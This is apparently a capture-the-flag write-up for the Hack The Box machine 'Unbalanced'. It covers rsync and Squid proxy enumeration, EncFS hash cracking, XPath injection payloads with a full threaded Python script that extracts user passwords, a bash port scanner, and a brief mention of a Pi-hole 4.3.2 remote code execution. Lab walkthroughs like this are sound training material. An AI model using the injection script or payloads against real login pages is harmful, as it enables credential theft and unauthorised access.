rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.
Setting Up SQUID Proxy in the browser
We have SQUID Proxy server running on port 3128. SQUID Proxy is normally used for filtering web traffic coming from the external network i.e Internet. I will be using Foxy Proxy for setting it up.
We don't really get anything, so we can proceed with Rsync Enumeration. Read about rsync over here.
Enumerating RSYNC Protocol
apt install rsync # Install Rsync using the following command
Working with EncFS (FUSE-based cryptographic filesystem)
This directory consists of junk files and a .encfs6.xml file. EncFS is a cryptographic file system which encrypts all the files present in that directory. We need to know the password to decrypt all the files.
encfs ./encrypted_folder ./decrypt_data
# This command will decrypt the directory (Password is required)
We can use encfs2john.py to create a hash and later crack it using John itself.
Now that we have the password, we can decrypt it.
Analyzing squid.conf file
This one looks interesting as we are allowed to access intranet.unbalanced.htb domain. We also have this cache_mgr password.
Cache Manager Access Control (SQUID)
This looks like a login portal for employees. I tried default usernames/passwords and also tried using the previously found passwords, but didn't get anything. We have cache_mgr passwd, that means we can browse the internal squid manager configuration.
We can check FQDN (fully qualified domain name) Cache for potential IPs and hostnames.
The FQDN cache is a built-in component of squid providing Hostname to IP-Number translation functionality and managing the involved data-structures. ... The FQDN cache usually doesn't block on a request except for special cases where this is desired (see below).
This intranet-hostx.unbalanced.htb are probably the load balancers. A load balancer is a device that acts as a reverse proxy and distributes network or application traffic across a number of servers. Load balancers are used to increase capacity (concurrent users) and reliability of applications.
Found a web page which can be vulnerable
Checking around the IP Addresses, I found this webpage and it was taken down due to security issues. (Looks interesting and can contain vulnerabilities). Let's run a gobuster scan against this IP.
gobuster dir --proxy http://10.10.10.200:3128/ -u http://172.31.179.1/ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt
This website is responsive, maybe we can try for SQL Injection on the login page. I tried using sqlmap to automate the process but didn't get anything.
Exploiting XPATH Injection
This one looks like a XPATH Injection. We can try to inject basic authentication payloads from here.
This is definitely XPATH Injection. We can exploit this with a script to get all the usernames and passwords.
' or Username='rita' and string-length(Password/text())=num and ''=' // To extract the length
' or Username='rita' and substring(Password/text(),{},1)='a' and ''=' // To extract the password
#!/usr/bin/env python
import requests
import string
import threading
import time
url = "http://172.31.179.1/intranet.php"
proxies = {'http':'10.10.10.200:3128'}
headers = {
"Content-Type":"application/x-www-form-urlencoded",
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Referer":"http://172.31.179.1/intranet.php",
"Origin":"http://172.31.179.1"
}
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@\$"
print chars
# users = ['bryan','rita,''sarah','jim']
class myThread (threading.Thread):
def __init__(self, threadID, user):
threading.Thread.__init__(self)
self.threadID = threadID
self.user = user
def run(self):
pass_length = length_extraction(self.user)
password = xpath_injection(self.user,pass_length)
print("[+] Creds found for {} : {}".format(self.user,password))
# Trying
def xpath_injection(user,length):
passwd = ""
for i in range(1,length+1):
for char in chars:
payload = {
"Username":"admin",
"Password":"' or Username='{}' and substring(Password/text(),{},1)='{}' and ''='".format(user,i,char)
}
resp = requests.post(url,data=payload,headers=headers,proxies=proxies)
if user in resp.text:
passwd += char
break
return passwd
# Working properly
def length_extraction(user):
for i in range(30):
payload = {
"Username":"admin",
"Password":"' or Username='{}' and string-length(Password/text())={} and ''='".format(user,i)
}
resp = requests.post(url,data=payload,headers=headers,proxies=proxies)
if user in resp.text:
print("[+] Length found: {}".format(i))
return i
break
starttime = time.asctime(time.localtime(time.time()))
print("[+] Script Started at {}".format(starttime))
# Calculating pass length for users
thread1 = myThread(1,"bryan").start()
thread2 = myThread(2,"rita").start()
thread3 = myThread(3,"jim").start()
thread4 = myThread(4,"sarah").start()
SSH Access as bryan user
# TODO List for byran user
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]
###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
Discovering Pi-Hole running on docker network
There's Pi-hole running on docker network. We need to find the IP Address for that machine. For that, we can use ip neigh command.
172.31.11.3 - Pi-hole might be running on this IP. To check, we can scan the ports using static nmap binary or by creating a simple bash script. The Pi-hole runs with 53 and 80 port to be opened (Default ports)
#!/bin/bash
ip=$1
if [[ $# -eq 0 ]];then
echo "[-] Supply IP Address"
exit 0
fi
for i in `seq 1 65535`;do
echo 1 > /dev/tcp/$ip/$i
if [[ $? -eq 0 ]];then
echo "[+] Port open: $i"
fi
done
Or we can also use curl to get the root page.
Forwarding ports using SSH
Let's forward the ports to our machine.
Exploiting Pi-Hole RCE ( Version : 4.3.2 )
The TODO note said that admin used a temporary password. I tried admin as a password and got authenticated. ( Pi-hole Version v4.3.2 )
MAC address input can be exploited to gain arbitrary code execution on the machine.
Using the admin interface password on the host machine to get root access.
